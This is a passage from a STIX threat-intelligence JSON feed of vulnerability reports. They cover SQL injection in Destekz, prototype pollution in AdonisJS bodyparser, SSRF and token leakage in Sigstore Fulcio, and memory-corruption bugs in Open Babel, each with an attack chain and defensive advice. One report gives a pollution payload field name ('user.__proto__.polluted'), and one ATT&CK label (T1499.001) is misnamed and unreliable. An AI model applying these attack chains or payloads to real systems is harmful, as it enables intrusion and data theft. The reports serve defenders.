      "description": "## Overview\n\nA critical SQL Injection vulnerability, identified as CVE-2026-4321, has been discovered in the Destekz product developed by Raera - Ankara Web Design and Digital Advertising Agency. This vulnerability affects all versions of Destekz up to and including June 2nd, 2026. With a CVSS v3.1 Base Score of 9.8, this flaw allows an unauthenticated attacker to execute arbitrary SQL commands on the backend database, potentially leading to unauthorized data access, modification, or even full system compromise. The significant concern for defenders is that the vendor, Raera, has confirmed that the Destekz product is no longer supported, meaning no official patches or security updates will be released to address this critical vulnerability, leaving all installations permanently exposed to exploitation.\n\n## Attack Chain\n\n1.  **Initial Access via Web Interface:** An unauthenticated attacker sends a specially crafted HTTP request to a vulnerable endpoint within the Destekz web application.\n2.  **Input Vector Identification:** The attacker targets specific input parameters (e.g., URL query parameters, form fields, HTTP headers) that are used in dynamically generated SQL queries.\n3.  **Malicious Payload Injection:** The crafted request includes malicious SQL metacharacters and commands (e.g., single quotes, semicolons, comments) intended to manipulate the application's intended SQL query logic.\n4.  **Backend Database Processing:** The Destekz application, failing to properly neutralize or sanitize these special elements, incorporates the attacker-supplied input directly into an SQL statement.\n5.  **Unauthorized SQL Command Execution:** The backend database server executes the modified, malicious SQL query as part of the legitimate application transaction.\n6.  **Data Compromise / System Manipulation:** Depending on the attacker's payload and the database's privileges, this can lead to unauthorized data retrieval (e.g., user credentials, sensitive business data), data modification, or potentially remote code execution on the database server.\n7.  **Impact Achieved:** The attacker successfully exfiltrates sensitive information, manipulates application data, or establishes further persistence.\n\n## Impact\n\nThe impact of CVE-2026-4321 is severe, as reflected by its CVSS v3.1 score of 9.8 (Critical). Successful exploitation allows unauthenticated attackers to bypass authentication, gain unauthorized access to the application's underlying database, and compromise all stored information. This includes sensitive customer data, proprietary business logic, and potentially administrative credentials. Given that the vendor has ceased support for Destekz, affected organizations face permanent exposure to this vulnerability, leading to an increased risk of data breaches, regulatory non-compliance, reputational damage, and financial losses due to persistent threat actor access.\n\n## Recommendation\n\n*   **Isolate and Decommission:** Due to the vendor's confirmed lack of support, immediately isolate and plan for decommissioning all instances of Raera Destekz, as no patch will be provided for CVE-2026-4321.\n*   **Deploy Web Application Firewall (WAF) Rules:** Implement and configure WAF rules to detect and block common SQL injection patterns targeting web applications. Focus on rules that inspect HTTP request bodies, URI paths, and query parameters for SQL metacharacters and keywords, aiming to prevent exploitation of the generic SQL Injection vulnerability described in CVE-2026-4321.\n*   **Network Segmentation:** Ensure that systems running Raera Destekz are isolated in a highly segmented network zone with strict egress filtering to limit potential lateral movement in case of compromise.\n*   **Application-Level Logging and Monitoring:** Enhance logging for web server access logs and database audit logs to detect anomalous query patterns or errors indicative of SQL injection attempts, which would be direct evidence of exploitation for CVE-2026-4321.\n",
      "published": "2026-07-03T13:05:02Z",
      "labels": [
        "sql-injection",
        "cve",
        "web-application",
        "vulnerability",
        "critical",
        "unsupported-product"
      ],
      "object_refs": [
        "attack-pattern--2e4d9280-53f9-5f98-9c79-9970f1080b3d"
      ],
      "external_references": [
        {
          "source_name": "reference",
          "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-4321"
        },
        {
          "source_name": "reference",
          "url": "https://siberguvenlik.gov.tr/guvenlik-bildirimleri/detay/tr-26-0488"
        }
      ],
      "confidence": 95
    },
    {
      "type": "attack-pattern",
      "spec_version": "2.1",
      "id": "attack-pattern--2e4d9280-53f9-5f98-9c79-9970f1080b3d",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "Exploit Public-Facing Application",
      "external_references": [
        {
          "source_name": "mitre-attack",
          "external_id": "T1190",
          "url": "https://attack.mitre.org/techniques/T1190"
        }
      ]
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--00cb3548-33bb-5024-bec0-087848b09537",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--b7620bdc-bcf7-5b09-a757-a4479ae6749d",
      "target_ref": "attack-pattern--2e4d9280-53f9-5f98-9c79-9970f1080b3d"
    },
    {
      "type": "attack-pattern",
      "spec_version": "2.1",
      "id": "attack-pattern--03c83a54-7fcd-5e1a-99d5-88d0bbd8fb19",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "Exploitation for Privilege Escalation",
      "external_references": [
        {
          "source_name": "mitre-attack",
          "external_id": "T1068",
          "url": "https://attack.mitre.org/techniques/T1068"
        }
      ]
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--fa74839d-af74-53b2-97aa-883b5a3f511c",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--b7620bdc-bcf7-5b09-a757-a4479ae6749d",
      "target_ref": "attack-pattern--03c83a54-7fcd-5e1a-99d5-88d0bbd8fb19"
    },
    {
      "type": "attack-pattern",
      "spec_version": "2.1",
      "id": "attack-pattern--e6e63efe-42b5-57bd-b4b7-a8415ab979eb",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "Command and Scripting Interpreter",
      "external_references": [
        {
          "source_name": "mitre-attack",
          "external_id": "T1059",
          "url": "https://attack.mitre.org/techniques/T1059"
        }
      ]
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--872e39fd-5371-597c-81bf-b02b97166e42",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--b7620bdc-bcf7-5b09-a757-a4479ae6749d",
      "target_ref": "attack-pattern--e6e63efe-42b5-57bd-b4b7-a8415ab979eb"
    },
    {
      "type": "report",
      "spec_version": "2.1",
      "id": "report--b7620bdc-bcf7-5b09-a757-a4479ae6749d",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "Incomplete Fix for CVE-2026-25754 in @adonisjs/bodyparser Leads to CVE-2026-48795",
      "description": "## Overview\n\nThe `@adonisjs/bodyparser` package for AdonisJS applications contains a critical vulnerability, CVE-2026-48795, which is an incomplete fix for a previously identified prototype pollution flaw (CVE-2026-25754). This vulnerability affects versions `\u003e= 10.1.3 \u003c 10.1.5` and `\u003e= 11.0.0-next.9 \u003c 11.0.3`. An unauthenticated attacker can remotely exploit this by sending a specially crafted `multipart/form-data` request. The bypass occurs because the underlying `lodash.set()` utility, used via `@poppinss/utils`, still creates intermediate objects that regain access to `Object.prototype` when payloads like `user.__proto__.polluted` are used. This allows for process-wide `Object.prototype` pollution, which can have severe consequences for the affected application, including authorization bypasses, unexpected behavior, or even remote code execution via gadget chains.\n\n## Attack Chain\n\n1.  An unauthenticated attacker identifies a vulnerable AdonisJS application accepting `multipart/form-data` requests.\n2.  The attacker crafts an HTTP POST request with a `multipart/form-data` content type.\n3.  The request body contains a form field whose name is a prototype pollution payload, structured to bypass the original fix, such as `user.__proto__.polluted`.\n4.  The vulnerable `@adonisjs/bodyparser` component processes the incoming `multipart/form-data` request.\n5.  During parsing, `@adonisjs/bodyparser` utilizes `lodash.set()` (via `@poppinss/utils`) to construct form fields.\n6.  `lodash.set()` creates intermediate objects using plain `{}` values, which re-introduce the `Object.prototype` into the inheritance chain once a \"normal\" segment (e.g., `user`) is processed before `__proto__`.\n7.  This action successfully pollutes the global `Object.prototype` within the application's process.\n8.  The polluted `Object.prototype` can then be leveraged by the attacker to trigger authorization bypasses, unexpected application behavior, or remote code execution by exploiting existing prototype pollution gadget chains.\n\n## Impact\n\nSuccessful exploitation of CVE-2026-48795 grants an unauthenticated attacker the ability to pollute the `Object.prototype` across the entire application process. This critical issue means that any route accepting `multipart/form-data` requests behind `BodyParserMiddleware` is vulnerable. The direct consequences can include authorization bypasses, allowing attackers to gain unauthorized access or elevate privileges within the application. Furthermore, the pollution can cause unpredictable behavior in various downstream libraries or enable exploitation of prototype pollution gadget chains, potentially leading to full remote code execution on the server hosting the AdonisJS application.\n\n## Recommendation\n\n*   Patch CVE-2026-48795 immediately by upgrading `@adonisjs/bodyparser` to version `10.1.5` or `11.0.3` or later.\n*   Review application logs for `multipart/form-data` POST requests containing `__proto__` or `constructor.prototype` in form field names, indicative of attempted exploitation.\n",
      "published": "2026-07-03T13:04:13Z",
      "labels": [
        "prototype-pollution",
        "web-vulnerability",
        "adonisjs",
        "rce"
      ],
      "object_refs": [
        "attack-pattern--2e4d9280-53f9-5f98-9c79-9970f1080b3d",
        "attack-pattern--03c83a54-7fcd-5e1a-99d5-88d0bbd8fb19",
        "attack-pattern--e6e63efe-42b5-57bd-b4b7-a8415ab979eb"
      ],
      "external_references": [
        {
          "source_name": "reference",
          "url": "https://github.com/advisories/GHSA-qcm7-3vpr-hj5h"
        },
        {
          "source_name": "reference",
          "url": "https://cwe.mitre.org/data/definitions/1321.html"
        },
        {
          "source_name": "reference",
          "url": "https://github.com/adonisjs/core/security/advisories/GHSA-f5x2-vj4h-vg4c"
        },
        {
          "source_name": "reference",
          "url": "https://github.com/adonisjs/bodyparser/releases/tag/v10.1.5"
        },
        {
          "source_name": "reference",
          "url": "https://github.com/adonisjs/bodyparser/releases/tag/v11.0.3"
        }
      ],
      "confidence": 80
    },
    {
      "type": "attack-pattern",
      "spec_version": "2.1",
      "id": "attack-pattern--2e4d9280-53f9-5f98-9c79-9970f1080b3d",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "Exploit Public-Facing Application",
      "external_references": [
        {
          "source_name": "mitre-attack",
          "external_id": "T1190",
          "url": "https://attack.mitre.org/techniques/T1190"
        }
      ]
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--55d51219-adf8-5049-9185-b26143568a7d",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--038a142e-54bd-5ef8-9ccd-dd70c2d6003c",
      "target_ref": "attack-pattern--2e4d9280-53f9-5f98-9c79-9970f1080b3d"
    },
    {
      "type": "attack-pattern",
      "spec_version": "2.1",
      "id": "attack-pattern--fe1e140b-0e35-5f0d-a990-f0c9146cacb3",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "Gather Victim Host Information",
      "external_references": [
        {
          "source_name": "mitre-attack",
          "external_id": "T1592",
          "url": "https://attack.mitre.org/techniques/T1592"
        }
      ]
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--50dd9a7a-9b4a-5a6d-8bc2-a547ae8363cb",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--038a142e-54bd-5ef8-9ccd-dd70c2d6003c",
      "target_ref": "attack-pattern--fe1e140b-0e35-5f0d-a990-f0c9146cacb3"
    },
    {
      "type": "attack-pattern",
      "spec_version": "2.1",
      "id": "attack-pattern--ce03e15a-3e03-5639-98e6-b790ad78c8fb",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "Subvert Trust Controls",
      "external_references": [
        {
          "source_name": "mitre-attack",
          "external_id": "T1553",
          "url": "https://attack.mitre.org/techniques/T1553"
        }
      ]
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--f8649bf0-c323-58ea-83a1-48aaee9d2110",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--038a142e-54bd-5ef8-9ccd-dd70c2d6003c",
      "target_ref": "attack-pattern--ce03e15a-3e03-5639-98e6-b790ad78c8fb"
    },
    {
      "type": "attack-pattern",
      "spec_version": "2.1",
      "id": "attack-pattern--dc5e4f03-1094-5965-8de6-b9af854b1653",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "Unsecured Credentials",
      "external_references": [
        {
          "source_name": "mitre-attack",
          "external_id": "T1552",
          "url": "https://attack.mitre.org/techniques/T1552"
        }
      ]
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--9cadd96a-aa2e-504c-8395-508955b4e2c8",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--038a142e-54bd-5ef8-9ccd-dd70c2d6003c",
      "target_ref": "attack-pattern--dc5e4f03-1094-5965-8de6-b9af854b1653"
    },
    {
      "type": "report",
      "spec_version": "2.1",
      "id": "report--038a142e-54bd-5ef8-9ccd-dd70c2d6003c",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "Sigstore Fulcio Vulnerabilities: OIDC Discovery Redirect Leads to SSRF, JWKS Substitution, and Kubernetes Token Leakage (CVE-2026-49478)",
      "description": "## Overview\n\nThree critical security vulnerabilities (CVE-2026-49478) have been identified in the OIDC Discovery client within Sigstore Fulcio versions up to and including 1.8.5. Fulcio, a certificate authority for Sigstore, is crucial for verifying the authenticity of software artifacts in the supply chain. Prior to this fix, Fulcio's OIDC discovery process could be exploited by a malicious or compromised OIDC issuer. This allowed attackers to redirect Fulcio's internal HTTP requests to internal systems, leading to blind Server-Side Request Forgery (SSRF). Furthermore, attackers could poison Fulcio's verifier cache by substituting legitimate JSON Web Key Sets (JWKS) with attacker-controlled ones, enabling the forging of signatures. Compounding these issues, Fulcio's integration with Kubernetes meant ServiceAccount tokens could be leaked to external hosts during OIDC discovery, granting attackers potential access to Kubernetes cluster resources. These flaws severely undermine the integrity and security guarantees provided by Fulcio.\n\n## Attack Chain\n\n1.  An attacker either controls a malicious OIDC issuer or compromises a legitimate one configured for Fulcio.\n2.  Fulcio, during its OIDC discovery process, initiates a request to fetch metadata (`/.well-known/openid-configuration`) from the attacker-controlled OIDC issuer.\n3.  The malicious OIDC issuer responds with an HTTP 3xx redirect to an internal IP address or hostname within Fulcio's network, such as the Kubernetes API server (`https://kubernetes.default.svc`), triggering a blind SSRF.\n4.  Simultaneously, the attacker-controlled issuer can provide a `jwks_uri` in its discovery response that points to an endpoint under the attacker's control.\n5.  Fulcio, following the malicious `jwks_uri`, fetches the attacker's JSON Web Key Set (JWKS) and caches it, effectively poisoning its internal verifier cache.\n6.  With the poisoned cache, the attacker can now forge signatures for software artifacts that Fulcio will validate as legitimate, bypassing critical integrity checks in the supply chain.\n7.  During these redirected HTTP requests and JWKS fetches, Fulcio inappropriately attaches its mounted Kubernetes ServiceAccount token to outbound requests directed towards the external, attacker-controlled hosts.\n8.  This leakage exposes the Kubernetes ServiceAccount token to the attacker, potentially enabling further reconnaissance, privilege escalation, and direct access to the Kubernetes cluster API and its resources.\n\n## Impact\n\nThe identified vulnerabilities have severe consequences across several domains. The blind SSRF allows attackers to probe and potentially interact with internal network services and infrastructure that would otherwise be inaccessible, potentially revealing sensitive information or enabling further internal attacks. JWKS substitution directly compromises the integrity verification process, allowing attackers to sign and distribute malicious software that appears legitimate, undermining the trust model of Sigstore and supply chain security. Most critically, the leakage of Kubernetes ServiceAccount tokens provides attackers with credentials that can be used to gain unauthorized access to the Kubernetes cluster. This can lead to full cluster compromise, data exfiltration, resource manipulation, and deployment of malicious workloads, affecting a wide range of organizations using Fulcio for artifact signing and verification, particularly those deployed within Kubernetes environments.\n\n## Recommendation\n\n*   **Upgrade immediately**: Patch affected Sigstore Fulcio instances to version 1.8.6 or newer to address CVE-2026-49478.\n*   **Monitor application logs**: Review application logs for Fulcio's OIDC discovery process for unusual HTTP redirects or fetches from unexpected `jwks_uri` endpoints, although the SSRF is blind and direct detection may be challenging.\n*   **Review Kubernetes ServiceAccount usage**: Audit the permissions granted to the Kubernetes ServiceAccounts used by Fulcio to ensure they adhere to the principle of least privilege, minimizing the impact of potential token leakage as described in CVE-2026-49478.\n",
      "published": "2026-07-03T13:03:14Z",
      "labels": [
        "supply-chain-security",
        "kubernetes",
        "oidc",
        "ssrf",
        "jwks",
        "cve"
      ],
      "object_refs": [
        "attack-pattern--2e4d9280-53f9-5f98-9c79-9970f1080b3d",
        "attack-pattern--fe1e140b-0e35-5f0d-a990-f0c9146cacb3",
        "attack-pattern--ce03e15a-3e03-5639-98e6-b790ad78c8fb",
        "attack-pattern--dc5e4f03-1094-5965-8de6-b9af854b1653"
      ],
      "external_references": [
        {
          "source_name": "reference",
          "url": "https://github.com/advisories/GHSA-f5mr-q85p-6hh6"
        }
      ],
      "confidence": 80
    },
    {
      "type": "report",
      "spec_version": "2.1",
      "id": "report--5342bcf8-9f5c-5376-97e2-ae2b3eddd139",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "Open Babel Heap Buffer Overflow in SMILES Parsing (CVE-2025-10996)",
      "description": "## Overview\n\nA critical memory-safety vulnerability, tracked as CVE-2025-10996, has been identified in Open Babel, a widely used C++ chemistry library and command-line tool. The flaw specifically resides within the `OBSmilesParser::ParseSmiles` function, which is responsible for interpreting SMILES (Simplified Molecular Input Line Entry Specification) strings. When processing a specially crafted and malformed SMILES input, the parser can write beyond the boundaries of a heap-allocated buffer, leading to a heap buffer overflow. This vulnerability affects all Open Babel versions up to and including 3.1.1. It is particularly concerning because Open Babel is often embedded in services that parse untrusted input and SMILES strings are frequently handled via command-line arguments and automated script pipelines, making the exploitation primitive easily reachable. A patch was released in version 3.2.0 on May 26, 2026, addressing the issue.\n\n## Attack Chain\n\n1.  **Attacker crafts malicious SMILES string**: The attacker develops a specially engineered SMILES string designed to exploit the heap buffer overflow vulnerability in Open Babel's `OBSmilesParser::ParseSmiles` function.\n2.  **Attacker delivers malicious SMILES string**: The crafted SMILES string is delivered to the victim, potentially via a malicious file (e.g., a `.smi` file), an email attachment, or as input within a web application or scientific workflow.\n3.  **Victim initiates SMILES parsing**: The victim, or an automated system, processes the malicious SMILES string using Open Babel through the `obabel` command-line tool, the `OBConversion` API, or any of its language bindings (Python, Ruby, Java, R, Perl, C#, PHP).\n4.  **`OBSmilesParser::ParseSmiles` is invoked**: Open Babel's internal `OBSmilesParser::ParseSmiles` function is called to interpret the malformed SMILES input string.\n5.  **Heap buffer overflow triggers**: During parsing, the specially crafted SMILES string causes the `ParseSmiles` function to write data beyond the allocated memory region on the heap.\n6.  **Memory corruption and impact**: This heap buffer overflow leads to memory corruption, which can result in a denial-of-service (DoS) condition by crashing the application, or, if successfully manipulated, arbitrary code execution within the context of the vulnerable Open Babel process.\n7.  **Post-exploitation (if RCE achieved)**: If arbitrary code execution is achieved, the attacker gains control over the compromised process, potentially enabling further actions such as data exfiltration, system compromise, or malware deployment.\n\n## Impact\n\nThe exploitation of CVE-2025-10996 can lead to severe consequences for organizations utilizing Open Babel. At minimum, a successful attack will result in a denial-of-service (DoS) condition, causing the Open Babel application or any service embedding it to crash. More critically, skilled attackers could potentially leverage this heap buffer overflow to achieve arbitrary code execution, granting them unauthorized control over the affected system. Organizations in scientific research, chemical industries, and any sector relying on chemical data processing and Open Babel for parsing untrusted SMILES input are at risk. The broad deployment of Open Babel, including its presence in Linux distributions and various language bindings, expands the potential attack surface.\n\n## Recommendation\n\n*   Patch CVE-2025-10996 immediately by upgrading Open Babel to version 3.2.0 or later on all affected systems and integrated services.\n*   Review all instances where Open Babel is used to parse external or untrusted SMILES input, especially those invoked via command-line or programmatic APIs.\n",
      "published": "2026-07-03T13:02:04Z",
      "labels": [
        "vulnerability",
        "buffer-overflow",
        "chemistry",
        "library",
        "cve"
      ],
      "external_references": [
        {
          "source_name": "reference",
          "url": "https://github.com/advisories/GHSA-j35x-w4gj-pf7w"
        },
        {
          "source_name": "reference",
          "url": "https://github.com/openbabel/openbabel/commit/b34cd604"
        }
      ],
      "confidence": 80
    },
    {
      "type": "attack-pattern",
      "spec_version": "2.1",
      "id": "attack-pattern--0430c6d1-8cfb-5747-9d15-4549f2ef9669",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "Exploitation for Client Execution",
      "external_references": [
        {
          "source_name": "mitre-attack",
          "external_id": "T1203",
          "url": "https://attack.mitre.org/techniques/T1203"
        }
      ]
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--c39007a4-7c0a-5ec7-bc88-50caeda2c9f3",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--fc0a8b95-929f-585c-bd9f-2ed501bcbbaf",
      "target_ref": "attack-pattern--0430c6d1-8cfb-5747-9d15-4549f2ef9669"
    },
    {
      "type": "report",
      "spec_version": "2.1",
      "id": "report--fc0a8b95-929f-585c-bd9f-2ed501bcbbaf",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "Open Babel Heap Buffer Overflow in ChemKin Parser (CVE-2025-10997)",
      "description": "## Overview\n\nA memory-safety vulnerability, identified as CVE-2025-10997, has been discovered in Open Babel, a widely used C++ library and command-line tool for chemistry file format conversion. This flaw, reported via OSS-Fuzz, specifically exists within the `ChemKinFormat::CheckSpecies` function of the ChemKin parser. Attackers can exploit this vulnerability by crafting a malicious ChemKin file that, when processed by a victim using Open Babel components (such as the `obabel` tool, the `OBConversion` API, or its language bindings), causes a heap buffer overflow. This leads to memory corruption, potentially resulting in application crashes (Denial of Service) or, under certain conditions, arbitrary code execution. All Open Babel releases up to and including version 3.1.1 are affected; the vulnerability was patched in version 3.2.0, released on 2026-05-26.\n\n## Attack Chain\n\n1.  Attacker crafts a malicious ChemKin file specifically designed to contain malformed species records, triggering the heap buffer overflow in `ChemKinFormat::CheckSpecies`.\n2.  The malicious ChemKin file is delivered to the victim, typically via social engineering (e.g., email attachment), malicious download link, or embedding within a seemingly legitimate data set.\n3.  The victim interacts with the malicious file, causing it to be processed by an Open Babel component, such as the `obabel` command-line tool, the `OBConversion` API, or one of its language bindings (Python, Ruby, Java, etc.).\n4.  Open Babel's internal parser, specifically within the `ChemKinFormat::CheckSpecies` function, attempts to process the malformed species record from the crafted file.\n5.  Due to the malformed data, the `ChemKinFormat::CheckSpecies` function attempts to write data beyond the allocated bounds of a heap-allocated buffer.\n6.  This heap buffer overflow corrupts memory, leading to an application crash (Denial of Service) or, under specific conditions, allows for arbitrary code execution on the victim's system.\n\n## Impact\n\nSuccessful exploitation of CVE-2025-10997 can lead to severe consequences for systems processing untrusted ChemKin files with affected versions of Open Babel. The primary impact includes denial of service, as the application processing the malicious file will likely crash due to memory corruption. More critically, sophisticated exploitation could lead to arbitrary code execution, granting attackers control over the compromised system. Open Babel is widely integrated, being shipped by Linux distributions and embedded in various services that parse chemical file formats. Organizations using Open Babel in such contexts, especially those handling external or untrusted data, are at risk.\n\n## Recommendation\n\n*   Patch CVE-2025-10997 by upgrading all instances of Open Babel and its language bindings to version 3.2.0 or later immediately.\n*   Implement strict input validation and sanitization for all ChemKin files processed by applications utilizing Open Babel components to mitigate risks from specially crafted inputs.\n*   Monitor systems that utilize Open Babel for unexpected application crashes or unusual process behavior that could indicate attempted exploitation.\n",
      "published": "2026-07-03T13:01:12Z",
      "labels": [
        "chemistry",
        "vulnerability",
        "buffer-overflow",
        "memory-corruption",
        "cve"
      ],
      "object_refs": [
        "attack-pattern--0430c6d1-8cfb-5747-9d15-4549f2ef9669"
      ],
      "external_references": [
        {
          "source_name": "reference",
          "url": "https://github.com/advisories/GHSA-8wq6-qh76-wpv9"
        },
        {
          "source_name": "reference",
          "url": "https://github.com/openbabel/openbabel/commit/af4a4212"
        }
      ],
      "confidence": 80
    },
    {
      "type": "attack-pattern",
      "spec_version": "2.1",
      "id": "attack-pattern--d8100894-0062-563c-a81b-7f4820e4cb88",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "User Execution",
      "external_references": [
        {
          "source_name": "mitre-attack",
          "external_id": "T1204",
          "url": "https://attack.mitre.org/techniques/T1204"
        }
      ]
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--12a0a8dc-7729-555a-9285-38d2cbd43501",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--9b5abfef-b96c-5d74-8f06-127d93ae1049",
      "target_ref": "attack-pattern--d8100894-0062-563c-a81b-7f4820e4cb88"
    },
    {
      "type": "report",
      "spec_version": "2.1",
      "id": "report--9b5abfef-b96c-5d74-8f06-127d93ae1049",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "Open Babel Uninitialized Pointer Dereference Vulnerability (CVE-2022-42885)",
      "description": "## Overview\n\nOpen Babel, a widely used C++ library and CLI tool for chemical file format conversions, is affected by a high-severity memory-safety vulnerability, CVE-2022-42885. Discovered in the GRO residue parser, this flaw allows an uninitialized pointer dereference when processing a specially crafted GRO input file. The vulnerability affects all versions up to and including 3.1.1 and was publicly disclosed with a patch in version 3.2.0 on May 26, 2026. Reported by Cisco TALOS, this issue impacts systems where Open Babel's `obabel` tool, `OBConversion` API, or its various language bindings (Python, Ruby, Java, R, Perl, C#, PHP) are used to parse untrusted GRO files. Exploitation can lead to application crashes or potentially arbitrary code execution, posing a significant risk to data processing workflows in chemistry and related scientific fields.\n\n## Attack Chain\n\n1. An attacker crafts a malicious GRO file specifically designed with a malformed residue record to exploit CVE-2022-42885.\n2. The attacker delivers this malicious GRO file to a target system, potentially via social engineering tactics such as email attachment or by embedding it within a seemingly legitimate data set.\n3. A user or an automated process on the target system opens or attempts to parse the malicious GRO file using the `obabel` CLI tool, an application leveraging Open Babel's `OBConversion` API, or one of its language bindings (e.g., Python, Java).\n4. During the parsing of the malformed record, Open Babel's GRO reader attempts to access a residue pointer that has not been properly initialized.\n5. This uninitialized pointer dereference leads to a memory access violation within the process.\n6. The memory access violation results in the application crashing (denial of service) or, in a more severe scenario, allows the attacker to achieve arbitrary code execution on the host system.\n\n## Impact\n\nThis vulnerability impacts systems that utilize Open Babel, particularly those that process GRO chemical file format data from untrusted sources. Since Open Babel is commonly shipped by Linux distributions and embedded in scientific services, a broad range of research institutions, academic organizations, and industrial entities could be affected. Successful exploitation via CVE-2022-42885 leads to immediate application termination, causing denial of service for any service or tool relying on Open Babel's GRO parsing. More critically, skilled attackers could potentially leverage this memory corruption to achieve arbitrary code execution on the compromised system, allowing for data exfiltration, further system compromise, or the deployment of additional malicious payloads.\n\n## Recommendation\n\n- Immediately update all installations of Open Babel to version 3.2.0 or newer to patch CVE-2022-42885.\n- Implement strict input validation and sandboxing for applications that process untrusted or user-supplied GRO files using Open Babel.\n- Educate users on the risks of opening or processing untrusted files, consistent with the initial access vector that requires a victim to open a malicious GRO file.\n",
      "published": "2026-07-03T12:54:02Z",
      "labels": [
        "vulnerability",
        "memory-safety",
        "cve",
        "open-babel"
      ],
      "object_refs": [
        "attack-pattern--d8100894-0062-563c-a81b-7f4820e4cb88"
      ],
      "external_references": [
        {
          "source_name": "reference",
          "url": "https://github.com/advisories/GHSA-mw5r-wq2m-397c"
        },
        {
          "source_name": "reference",
          "url": "https://github.com/openbabel/openbabel/commit/fa9a2d9a"
        }
      ],
      "confidence": 80
    },
    {
      "type": "attack-pattern",
      "spec_version": "2.1",
      "id": "attack-pattern--0430c6d1-8cfb-5747-9d15-4549f2ef9669",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "Exploitation for Client Execution",
      "external_references": [
        {
          "source_name": "mitre-attack",
          "external_id": "T1203",
          "url": "https://attack.mitre.org/techniques/T1203"
        }
      ]
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--50040056-7e39-5901-b120-5d2c817d4ea4",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--587e3fd0-27fc-5c98-854f-af7cba40bda5",
      "target_ref": "attack-pattern--0430c6d1-8cfb-5747-9d15-4549f2ef9669"
    },
    {
      "type": "attack-pattern",
      "spec_version": "2.1",
      "id": "attack-pattern--6321d9e8-1495-5cee-9dc7-66574584ff1b",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "Application Compromise: Arbitrary Code Execution",
      "external_references": [
        {
          "source_name": "mitre-attack",
          "external_id": "T1499.001",
          "url": "https://attack.mitre.org/techniques/T1499/001"
        }
      ]
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--4ac56552-3b02-5c86-88bd-ae8241218859",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--587e3fd0-27fc-5c98-854f-af7cba40bda5",
      "target_ref": "attack-pattern--6321d9e8-1495-5cee-9dc7-66574584ff1b"
    },
    {
      "type": "report",
      "spec_version": "2.1",
      "id": "report--587e3fd0-27fc-5c98-854f-af7cba40bda5",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "Open Babel PQS coord_file parser suffers from out-of-bounds write vulnerability (CVE-2022-43467)",
